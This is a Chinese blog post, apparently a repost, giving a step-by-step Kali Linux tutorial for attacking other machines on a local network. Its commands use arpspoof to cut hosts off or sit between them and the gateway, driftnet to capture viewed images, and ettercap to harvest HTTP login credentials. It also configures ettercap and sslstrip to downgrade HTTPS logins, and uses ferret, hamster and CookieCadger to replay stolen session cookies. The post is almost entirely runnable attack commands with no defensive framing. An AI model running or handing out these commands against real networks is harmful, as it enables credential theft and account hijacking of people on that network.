zoukankan      html  css  js  c++  java
  • kali渗透

    局域网-断网&劫持(kali)

     

    1.查看局域网中的主机

    fping –asg 192.168.1.0/24

    2.断网

    arpspoof -i wlan0 -t 192.168.100 192.168.1.1

    (arpspoof  -i 网卡 -t 目标IP 网关)

    3.流量劫持

    echo 1 >/proc/sys/net/ipv4/ip_forward

    (echo空格1空格>)

    arpspoof -i wlan0 -t 192.168.100 192.168.1.1

    4.图片嗅探

    (1)方法1(实验不成功)

    echo 1 >/proc/sys/net/ipv4/ip_forward

    arpspoof -i wlan0 -t 192.168.100 192.168.1.1

    driftnet -i wlan0

    (原因分析:可能丢包原因吧)

    (2)方法2(成功)

    sudo ettercap -i wlan0  -T -M arp:remote /192.168.1.253//192.168.1.100/ 

    driftnet -i wlan0

    (图片文件夹:/tmp/driftnet)

    Ubuntu下可以安装工具:

    sudo apt-get install  ettercap-text-only

    sudo apt-get install driftnet

     )

    5.http登录账号密码嗅探

    echo 1 >/proc/sys/net/ipv4/ip_forward

    arpspoof -i wlan0 -t 192.168.100 192.168.1.1

    ettercap -Tq -i wlan0 

    (信息太庞杂,可以使用 ettercap -Tq -i wlan0 >test方便查找)

    6.https登录账号密码嗅探

    vim /etc/ettercap.conf

    # if you use iptables:

       #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

       #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

    修改为

    # if you use iptables:

       redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

       redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

    sslstrip -a -f -k

    echo 1 >/proc/sys/net/ipv4/ip_forward

    arpspoof -i wlan0 -t 192.168.100 192.168.1.1

    ettercap -Tq -i wlan0 

    7.会话劫持

    (1)方法1

    arpspoof  

    wireshark        -->抓包

    ferret         --。重新生成抓包后的文件

    hamster       -- > 重放流量

    $echo 1 >/proc/sys/net/ipv4/ip_forward

    $arpspoof -i wlan0 -t 192.168.100 192.168.1.1

    $wireshark

    wireshark 保存为.pcap文件

    $ferret -r cookie.pcap

    将生成的txt文件放到用户目录下

    $hamster

    配置代理

    访问127.0.0.1:1234(上一步的代理)

    (2)方法2

    $echo 1 >/proc/sys/net/ipv4/ip_forward

    $arpspoof -i wlan0 -t 192.168.100 192.168.1.1

    $ferret -i wlan0

    $hamster

    (3)方法3

    $echo 1 >/proc/sys/net/ipv4/ip_forward

    $arpspoof -i wlan0 -t 192.168.100 192.168.1.1

    CookieCadger-1.08.jar

    此文章转自:https://www.cnblogs.com/yaolei/p/4763334.html

  • 相关阅读:
    reduce 一知半解(一):根据id合并两个数组
    textarea去除右下角默认样式
    css禁止点击事件
    poj 2723 二分+2-sat判定
    hdu 3062 2-Sat入门
    poj 3694双联通缩点+LCA
    poj 1986LCA离线dfs+并查集
    poj 1330 LCA最近公共祖先
    poj 1882完全背包变形
    poj 1948二维01背包
  • 原文地址:https://www.cnblogs.com/misswangxing/p/11139797.html
Copyright © 2011-2022 走看看